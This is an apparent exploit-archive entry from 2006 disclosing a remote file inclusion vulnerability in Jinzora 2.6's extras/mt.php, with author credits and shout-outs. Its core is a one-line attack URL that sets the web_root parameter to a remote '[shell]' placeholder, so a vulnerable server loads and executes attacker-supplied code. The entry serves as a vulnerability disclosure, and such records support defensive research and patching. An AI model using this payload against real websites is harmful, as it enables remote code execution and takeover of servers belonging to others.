id: 995
date: 10/13/2006
title: Jinzora <= 2.6 (extras/mt.php) Remote File Include Vulnerability
author: ddoshomo
cves: 

================================================================
Jinzora <= 2.6 (extras/mt.php) Remote File Include Vulnerability
================================================================



#  ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
#  Jinzora 2.6 - Remote File Include Vulnerabilities
 
# Credits : ERNE
 
# Thanks  : Liz0zim, Bitter.Melish, D3ngsz, Rmx, Di_lejyoner, Xoron
 
# Vulnerable :
 
     http://www.site.com/[path]/extras/mt.php?web_root=[shell]


#  0day.today [2023-03-24]  #